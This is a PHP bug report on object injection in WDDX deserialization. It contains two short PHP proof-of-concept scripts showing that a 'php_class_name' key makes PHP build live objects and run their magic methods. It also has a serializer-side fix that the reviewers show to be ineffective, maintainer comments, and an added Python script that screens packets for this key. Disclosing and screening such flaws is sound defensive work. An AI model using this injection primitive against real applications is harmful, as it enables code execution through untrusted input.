Bug #75044 Object Injection in PHP's WDDX Serialization
Submitted: 2017-08-07 10:20 UTC Modified: 2017-08-13 19:40 UTC
From: taoguangchen at icloud dot com Assigned:
Status: Open Package: WDDX related
PHP Version: 5.6.31 OS: *
Private report: No CVE-ID: None

 [2017-08-07 10:20 UTC] taoguangchen at icloud dot com
Description:
------------
PoC 1:
```
<?php
// A class whose magic methods show that a live object was created:
// __wakeup() fires during deserialization, __destruct() at shutdown.
class ryat {
	var $hi;
	function __wakeup() {
		echo 'hi';
	}
	function __destruct() {
		echo $this->hi;
	}
}

// A plain array whose 'php_class_name' key is enough to make
// wddx_deserialize() instantiate ryat and populate its $hi property.
$array = ['php_class_name'=>'ryat', 'hi'=>'ryat'];
wddx_deserialize(wddx_serialize_value($array));
```
PoC 2:
```
<?php
// Same class as in PoC 1, reached through the session machinery instead.
ini_set('session.serialize_handler', 'wddx');
session_start();

$array = ['php_class_name'=>'ryat', 'hi'=>'ryat'];
$_SESSION['ryat'] = $array;
// Round-tripping the session through the wddx handler instantiates ryat.
session_decode(session_encode());

// Declared after use; PHP hoists a top-level class that has no parent.
class ryat {
	var $hi;
	function __wakeup() {
		echo 'hi';
	}
	function __destruct() {
		echo $this->hi;
	}
}
```

Fix:
```
static void php_wddx_serialize_array(wddx_packet *packet, zval *arr)
{
...
		if (is_struct) {
			ent_type = zend_hash_get_current_key_ex(target_hash, &key, &key_len, &idx, 0, NULL);

			if (ent_type == HASH_KEY_IS_STRING) {
+				if (!strcmp(key, PHP_CLASS_NAME_VAR)) {
+					continue;
+				}
				php_wddx_serialize_var(packet, *ent, key, key_len TSRMLS_CC);
```
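Review bot: the added `strcmp(key, PHP_CLASS_NAME_VAR)` check sits in php_wddx_serialize_array(), i.e. on the serialization side, so it only stops PHP itself from emitting a php_class_name member for an array that happens to contain that key; a packet supplied by someone else still arrives with php_class_name intact and is still turned into an object, so the PoCs are unaffected. A guard would have to live where the deserializer resolves a struct's php_class_name into a class (refusing it, or checking it against an allow-list), not here. As written the `continue` also silently drops a caller's own 'php_class_name' element, so if the serialization-side change is kept at all, the reserved key should be documented.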

 [2017-08-07 19:50 UTC] stas@php.net
The proposed fix doesn't seem to fix anything in fact, as it's changing serialization, not unserialization, but the question is should we consider this an issue? I.e. if wddx supports live php objects, it would be basically in the same class as unserialize, with same (none) security guarantees as it seems.
 [2017-08-13 19:40 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2017-08-13 19:40 UTC] cmb@php.net
> it would be basically in the same class as unserialize, with
> same (none) security guarantees as it seems.

Indeed, it is; see <http://news.php.net/php.internals/100183> and
<http://svn.php.net/viewvc?view=revision&revision=342852>.
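The screening check a consumer of untrusted WDDX would need, given that packets carrying php_class_name are live objects in the same sense as unserialize() input, as an added Python example that is not part of this report or of PHP: it parses a packet and lists the classes wddx_deserialize() would instantiate, so the packet can be rejected (or checked against an allow-list) before it reaches the extension. The sample packets are constructed to match the shape of the reporter's PoC array.

```python
"""Screen a WDDX packet for structs PHP would turn into live objects.
wddx_deserialize() instantiates any <struct> that carries a php_class_name
member (running __wakeup then, later, __destruct), so untrusted packets
need this check before they reach the extension. Sample packets are
constructed to match the shape wddx_serialize_value() gives the PoC."""
import xml.etree.ElementTree as ET

CLASS_VAR = "php_class_name"  # the key PHP's wddx.c compares against

def deserialize_classes(packet):
    """Class names wddx_deserialize() would instantiate, in document order;
    nested structs (e.g. elements of an <array>) are included."""
    names = []
    for struct in ET.fromstring(packet).iter("struct"):
        for var in struct.findall("var"):  # key must be a direct member
            if var.get("name") == CLASS_VAR:
                value = var.find("string")
                names.append(value.text if value is not None and value.text else "")
    return names

def is_packet_safe(packet, allowed=frozenset()):
    """True only if every class the packet would instantiate is allow-listed;
    unparseable input is rejected rather than passed through."""
    try:
        names = deserialize_classes(packet)
    except ET.ParseError:
        return False
    return all(name in allowed for name in names)

# Constructed: the reporter's $array as wddx_serialize_value() would emit it.
POC_PACKET = ("<wddxPacket version='1.0'><header/><data><struct>"
              "<var name='php_class_name'><string>ryat</string></var>"
              "<var name='hi'><string>ryat</string></var>"
              "</struct></data></wddxPacket>")
# Same struct without the class key: deserializes to an ordinary array.
PLAIN_PACKET = POC_PACKET.replace(
    "<var name='php_class_name'><string>ryat</string></var>", "")
# The class key one level down, inside an array element.
NESTED_PACKET = ("<wddxPacket version='1.0'><header/><data><array length='1'>"
                 "<struct><var name='php_class_name'><string>ryat</string>"
                 "</var></struct></array></data></wddxPacket>")

if __name__ == "__main__":
    for label, pkt in (("poc", POC_PACKET), ("plain", PLAIN_PACKET),
                       ("nested", NESTED_PACKET)):
        print(label, deserialize_classes(pkt), is_packet_safe(pkt))
```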
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Nov 19 01:31:42 2017 UTC